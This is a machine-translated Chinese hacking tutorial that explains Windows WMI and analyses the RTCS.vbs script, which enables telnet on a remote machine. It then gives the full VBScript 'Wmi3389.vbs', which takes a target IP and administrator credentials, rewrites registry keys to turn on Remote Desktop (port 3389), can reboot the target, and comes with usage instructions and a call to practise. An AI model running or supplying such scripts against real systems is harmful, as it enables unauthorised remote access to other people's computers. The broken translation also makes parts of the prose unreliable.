Author: floating leaf it township QQ:9 4 5 2 9 1 8 4 ==================================================================================== Remember that python in X 2 0 0 4 during the second period mentioned WMI in the invasion in a special role, I think we should also on this article memory worries new? In the article we show two simple scripts, respectively, to achieve a log backup and delete also mentioned everyone should not unfamiliar zzzEVAzzz Write A can remote open telnet[service]()and set the program rots. vbs, with over rots. vbs after you have not thought of yourself to write such a script? Well, come with me(don't get excited, uh) is. A: WMI basics ==================================================================================== WMI was first introduced in 1 9 9 8 years as an add-on component with Windows NT 4.0 Service Pack 4 together with the release, is built-in in Windows 2 0 0 0, Windows XP, and Windows Server 2 0 0 3 Series[operating system]()the core of management support[technique]()to the interface(Application ProgrammingInterfaces, API)to access and manage Windows resources. As long as you are familiar with the system[programming]()you'll know that APIS are so important. But most scripting languages are not directly calling the Win32 API, WMI appears so that the system administrator can through a simple method i.e. the use of a common scripting language to achieve common system management tasks. Use WMI needs and scripts such as WSH and VBScript can be combined to achieve the functions we can see Microsoft's MSDN documentation. Writing our own script before we need to the WMI architecture has a basic understanding. As shown in Figure one: (1.gif) In the WMI architecture we need most concerned about is the WMI providers, the WMI providers in the WMI and a managed resource between plays an intermediary role. Provider on behalf of the user application programs and scripts from a WMI managed resource request information, and send instructions to WMI managed resources. The following is our use WMI[programming]()often have to use WMI built-in providers list, in order for[programming]()reference. 1. Active Directory provider Link library files: dsprov.dll Namespace: root\directory\ldap Role: the Active Directory object is mapped to WMI. 2. The event log provider Link library files: ntevt.dll Namespace: root\cimv2 The role: manage the Windows Event Log, for example, read, backup, clear, copy, delete, monitor, rename, compression, decompression, and change the event log settings. 3. The registry provider Link library files: stdprov.dll Namespace: root\default Role: read, write, enumerate, monitor, create, Delete registry keys and values. 4. Win32 provider Link library files: cimwin32.dll Namespace: root\cimv2 Role: to provide information about the computer, disks, peripheral devices, FILES, folders, File Systems, [Internet]()component, the[operating system](), printers, processes, Security, [Service](), shares, SAM users and groups, as well as more information resources. 5. The Windows Installer provider Link library files: msiprov.dll Namespace: root\cimv2 Role: provide installed software Information Access. From the above it can be seen in WMI, a class that is built-in provider, are grouped into a namespace, the namespace can be viewed as a group. For example, the root\cimv2 namespace includes most of the usually expressed with the computer and the[operating system]()associated with the resource class. In the use of the class time to show the class where the namespace. Class consists of attributes and methods of composition. This is the Visual[programming]()in two important concepts. The property described is the state of the object, the method is the object can perform the operation. The theory of knowledge learn it very boring, let's enjoy the analysis master script source edge theoretical knowledge consolidation. II: analysis of RTCS. VBS main code ===================================================================================== Sometimes reading someone else's source code something that is not a good and quick way, let us to seriously study zzzEVAzzz Write A can remote open telnet[service]()of the script RTCS. VBS. The script can directly access the target of the WMI,does not depend on the target of ipc$,enabling remote turn on/off the target telnet[service](), in order to facilitate everyone to learn I'm out of the main code, The specific analysis is as follows: set objlocator=createobject("wbemscripting. swbemlocator") //Create a WbemScripting. The SwbemLocator object(script interface). //As can be seen WMI is actually the Com component WbemScripting. SWbemLocator package together. set objswbemservices=objlocator. connectserver(ipaddress,"root/default",username,password) //By the ConnectServer function requests a connection to the WMI Control[Service](), the root/default as the namespace. set objinstance=objswbemservices. get("the stdregprov") //Establish access to the registry instance. set objmethod=objinstance. methods_("SetDWORDvalue") //Build can change the registry key value of the method. set objinparam=objmethod. inparameters. spawninstance_() //MethodData. InParameters used to get or set method's input parameters. Here spawninstance method for it to establish a sub-instance, the following can be the parameter values assigned to this object's properties. objinparam. hdefkey=&h80000002 //hdefkey represents the root key, the root key of hexadecimal values as follows: //HKEY_CLASSES_ROOT (&H80000000) //HKEY_CURRENT_USER (&H80000001) //HKEY_LOCAL_MACHINE (&H80000002) //HKEY_USERS (&H80000003) //HKEY_CURRENT_CONFIG (&H80000005) objinparam. ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0" //ssubkeyname represents the sub-key. objinparam. svaluename="NTLM" //svaluename represents the attribute name. objinparam. uvalue=ntlm //uvalue represents the key value. set objoutparam=objinstance. execmethod_("SetDWORDvalue",objinparam) //Use execmethod to perform the method, where only really rewriting the registry. //The following is to modify the telnet[service]()TelnetPort values, principles Ibid. objinparam. svaluename="TelnetPort" objinparam. uvalue=port set objoutparam=objinstance. execmethod_("SetDWORDvalue",objinparam) To modify the telnet part of the registry is complete, the NTLM and TelnetPort has been modified, if the other party telnet[service]()is not turned on? Next you need to telnet to the specific case, to start the telnet[service](), continues to see the code. //First query on the remote host tlntsvr start. set objswbemservices=objlocator. connectserver(ipaddress,"root\cimv2",username,password) //the win32_service class in the root\cimv2 namespace, the role didn't forget? Look at the basics of the Oh。 set colinstances=objswbemservices. execquery("select * from win32_service where name='tlntsvr'") //Note: query is by enumeration to achieve. for each objinstance in colinstances if objinstance. startmode="Disabled" then set objmethod=objinstance. methods_("changestartmode") //Create the changestartmode method to change the tlntsvr start. set objinparam=objmethod. inparameters. spawninstance_() objinparam. startmode="Manual" //The start mode to the manual mode. set objoutparam=objinstance. execmethod_("changestartmode",objinparam) end if //The following starts our telnet[service]()has been initiated should not use the stopservice method to stop[service]()instance[service]()method. else intstatus=objinstance. startservice() end if next Three: taught you how to write the WMI version of the ROTS. vbs to open 3 3 8 9 ===================================================================================== zzzVEAzzz of script analysis to Here Now, how? Very EASY, right?! I believe that everyone must be around the corner?:) Well, together to write a what program? ROTS. vbs I think everybody must have ever used? What the hell? I...... Smashing! Everyone should know this ROTS is with its conditions of use, not only have the administrator[account](), but also to allow for ipc connection, in this everywhere is the wall, the ipc has long been not practical, and ROTS. vbs had been killing, then what should I do? Of course is the Do-It-Yourself. Can not achieve the ROTS the same as the remote open 3 3 8 9 The function and not subject to ipc limits? Answer since I wrote this article after becoming sure, ha ha, blown blown it. Of course we also require the system to at least 2000server and above, and recently saw a software can give 2000pro open 3 3 8 9, due to the relatively busy, nor how to deal with it, here we are for the time being do not say it, know the principles as well. Open 3 3 8 9 There is a registry import of the method, some other software of the Open method, I want to also mostly by modifying registry to achieve. This method need to import the following registry: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] "Enabled"="0" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "ShutdownWithoutLogon"="0" [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] "EnableAdminTSRemote"=dword:0 0 0 0 0 0 0 1 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "TSEnabled"=dword:0 0 0 0 0 0 0 1 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] "Start"=dword:0 0 0 0 0 0 0 2 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] "Start"=dword:0 0 0 0 0 0 0 2 [HKEY_USERS\\. DEFAULT\Keyboard Layout\Toggle] "Hotkey"="1" Principles know it's hard to disentangle our idea, our main task is to change the registry key values. The first is to create a WMI object, and then is connected to the remote WMI[service](), and finally modify the registry key values. Part of the main code is as follows, the complete code and detailed comments please see accompanying package on error resume next //Prevent the occurrence of the accident. set outstreem=wscript. stdout if (lcase(right(wscript. fullname,1 1))="wscript.exe") then set objShell=wscript. createObject("wscript. shell") objShell. Run("cmd.exe /k cscript //nologo "&chr(3 4)&wscript. scriptfullname&chr(3 4)) //cmd with the/K parameter represents the string specified by the command. wscript. quit end if //Perform a simple check. if wscript. arguments. count<3 then usage() wscript. echo "Not enough parameters." wscript. quit end if //Remove the parameter, respectively, given a few variables. ipaddress=wscript. arguments(0) username=wscript. arguments(1) password=wscript. arguments(2) option=wscript. arguments(3) usage() The following is the core code, but also to achieve remote modify the registry functions, I here give another implementation manner, the control of the preceding code is easy to understand, I'll just make a simple explanation. Details can refer to MSDN documentation about the StdRegProv class description. ofto const HKEY_LOCAL_MACHINE = &H80000002 const HKEY_USERS=&H80000003 strComputer = ipaddress //Get the wmi object Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\" &_ strComputer & "\root\default:the StdRegProv") strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\netcache" strValueName = "Enabled" strValue=0 oReg. SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" strValueName = "ShutdownWithoutLogon" strValue=0 oReg. SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strKeyPath = "SOFTWARE\Policies\Microsoft\Windows\Installer" strValueName = "EnableAdminTSRemote" strValue=1 oReg. SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" strValueName = "TSEnabled" strValue=1 oReg. SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strKeyPath = "SYSTEM\CurrentControlSet\Services\TermDD" strValueName = "Start" strValue=2 oReg. SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strKeyPath = "SYSTEM\CurrentControlSet\Services\TermService" strValueName = "Start" strValue=2 oReg. SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strKeyPath = ". DEFAULT\Keyboard Layout\Toggle" strValueName = "Hotkey" strValue=1 oReg. SetDWORDValue HKEY_USERS,strKeyPath,strValueName,strValue //The following implement the restart of the remote machine if option="/r" then outstreem. write "Now, rebooting the target...." strwmiquery="select * from win32_operatingsystem where primary='true'" set colinstances=objswbemservices. execquery(strwmiquery) for each objinstance in colinstances objinstance. win32shutdown(2) end if outstreem. write "Ok, rebooted the target." //Simple usage instructions function. function usage() wscript. echo string(6 0,"=") wscript. echo "Wmi3389 v1. 0. 0" wscript. echo "No ipc Open 3 3 8 9, code written by pye." wscript. echo "Welcome to visite [www.coon.cn]() or Mail to [grandh4408@yahoo.com.cn]()" wscript. echo "Usage:" wscript. echo "cscript "&wscript. scriptfullname&" targetIP username password [/r]" wscript. echo "/r reboot the target this is optional" wscript. echo "It use WMI to Open 3 3 8 9 of the target server." wscript. echo string(6 0,"=")&vbcrlf end function Will the above copy the code with Notepad, Save As Wmi3389. vbs. Then in CMD in the Execute: cscript Wmi3389. vbs ipaddress administrator password [/r] See what is not, and ROTS. the vbs have the same effect? Everyone hurry up and practice practice. Four: the last of the nagging ===================================================================================== You can see the WMI function is very powerful, here to thank MicroSoft, and it's never let us down. The WMI object is allowed to pass through VB, VBA, WSH, VBScript, JScript, ASP, or support[auto]()objects of the other environment, the WMI for full access. In reference to the query system was added WMI Scripting V1. 1 Library, Visual Basic or VBA programs can access these objects. Support ActiveX program the operation of the platform can be by Object class code, or the name of the class creating these objects, of these objects is prefixed with WbemScripting, as WbemScripting. SwbemLocator it. So everyone interested can use VB, WSH, VBScript, JScript, ASP, etc. writing more use of WMI[hack]()program. By the procedure of preparation I think everyone on the WMI already had a preliminary understanding, I think we also some of it generated strong interest, and here I am just a simple description of the role, what's the problem, I really hope you can join me for the exchange of learning and common progress.

Query Builder